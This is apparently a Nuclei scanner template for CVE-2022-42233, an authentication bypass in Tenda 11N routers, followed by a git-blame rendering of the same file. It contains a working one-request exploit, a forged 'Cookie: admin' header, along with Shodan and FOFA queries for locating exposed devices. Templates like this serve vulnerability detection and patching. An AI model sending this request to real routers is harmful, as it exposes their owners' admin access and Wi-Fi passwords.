nuclei-templates/http/cves/2022/CVE-2022-42233.yaml

id: CVE-2022-42233

info:
  name: Tenda 11N - Authentication Bypass
  author: For3stCo1d
  severity: critical
  description: |
    Tenda 11N with firmware version V5.07.33_cn contains an authentication bypass vulnerability. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  remediation: |
    Apply the latest firmware update provided by Tenda to fix the authentication bypass vulnerability (CVE-2022-42233).
  reference:
    - https://github.com/D0ngsec/vulns/blob/main/Tenda/Tenda_11N_Authentication_Bypass.md
    - https://nvd.nist.gov/vuln/detail/CVE-2022-42233
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-42233
    cwe-id: CWE-287
    epss-score: 0.85271
    epss-percentile: 0.98209
    cpe: cpe:2.3:o:tenda:11n_firmware:5.07.33_cn:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: tenda
    product: 11n_firmware
    shodan-query: http.title:"Tenda 11N"
    fofa-query: product=="Tenda-11N-Wireless-AP"
  tags: cve,cve2022,tenda,auth-bypass,router,iot

http:
  - raw:
      - |
        GET /index.asp HTTP/1.1
        Host: {{Hostname}}
        Cookie: admin

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'def_wirelesspassword'
          - 'Tenda 11N'
        case-insensitive: true
        condition: and

      - type: word
        part: header
        words:
          - 'GoAhead-Webs'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022012ef8caa8a8f1eb85f99831ff8ad5f61517fb3adbfbbf20e122211fb66f51e34022100a23e829eb3e9a168dfba07b7e46ebd7ec6551585bf669b62e71da69a8b41d18e:922c64590222798bb761d5b6d8e72950
Create CVE-2022-42233.yaml 2022-11-02 15:44:15 +00:00			`id: CVE-2022-42233`

			`info:`
			`name: Tenda 11N - Authentication Bypass`
			`author: For3stCo1d`
			`severity: critical`
			`description: \|`
Syntax errors 2023-04-10 19:56:05 +00:00			`Tenda 11N with firmware version V5.07.33_cn contains an authentication bypass vulnerability. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.`
updated 2022 CVEs 2023-09-06 11:59:08 +00:00			`remediation: \|`
			`Apply the latest firmware update provided by Tenda to fix the authentication bypass vulnerability (CVE-2022-42233).`
Create CVE-2022-42233.yaml 2022-11-02 15:44:15 +00:00			`reference:`
			`- https://github.com/D0ngsec/vulns/blob/main/Tenda/Tenda_11N_Authentication_Bypass.md`
			`- https://nvd.nist.gov/vuln/detail/CVE-2022-42233`
Auto Generated CVE annotations [Thu Nov 3 17:48:40 UTC 2022] :robot: 2022-11-03 17:48:40 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.8`
			`cve-id: CVE-2022-42233`
			`cwe-id: CWE-287`
TemplateMan Update [Fri Oct 27 16:34:45 UTC 2023] :robot: 2023-10-27 16:34:45 +00:00			`epss-score: 0.85271`
TemplateMan Update [Sat Nov 11 17:44:56 UTC 2023] :robot: 2023-11-11 17:44:56 +00:00			`epss-percentile: 0.98209`
updated 2022 CVEs 2023-09-06 11:59:08 +00:00			`cpe: cpe:2.3:o:tenda:11n_firmware:5.07.33_cn:::::::*`
Create CVE-2022-42233.yaml 2022-11-02 15:44:15 +00:00			`metadata:`
boolean format update 2023-06-04 08:13:42 +00:00			`verified: true`
updated 2022 CVEs 2023-09-06 11:59:08 +00:00			`max-request: 1`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`vendor: tenda`
			`product: 11n_firmware`
updated 2022 CVEs 2023-09-06 11:59:08 +00:00			`shodan-query: http.title:"Tenda 11N"`
			`fofa-query: product=="Tenda-11N-Wireless-AP"`
Update CVE-2022-42233.yaml 2022-11-03 12:18:21 +00:00			`tags: cve,cve2022,tenda,auth-bypass,router,iot`
Create CVE-2022-42233.yaml 2022-11-02 15:44:15 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Create CVE-2022-42233.yaml 2022-11-02 15:44:15 +00:00			`- raw:`
			`- \|`
			`GET /index.asp HTTP/1.1`
Update CVE-2022-42233.yaml 2022-11-02 16:16:14 +00:00			`Host: {{Hostname}}`
Create CVE-2022-42233.yaml 2022-11-02 15:44:15 +00:00			`Cookie: admin`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
			`- 'def_wirelesspassword'`
Update CVE-2022-42233.yaml 2022-11-03 12:18:21 +00:00			`- 'Tenda 11N'`
			`case-insensitive: true`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`condition: and`
Create CVE-2022-42233.yaml 2022-11-02 15:44:15 +00:00
			`- type: word`
			`part: header`
			`words:`
			`- 'GoAhead-Webs'`

			`- type: status`
			`status:`
			`- 200`
Auto Template Signing [Sat Nov 11 17:38:54 UTC 2023] :robot: 2023-11-11 17:38:55 +00:00			`# digest: 4a0a00473045022012ef8caa8a8f1eb85f99831ff8ad5f61517fb3adbfbbf20e122211fb66f51e34022100a23e829eb3e9a168dfba07b7e46ebd7ec6551585bf669b62e71da69a8b41d18e:922c64590222798bb761d5b6d8e72950`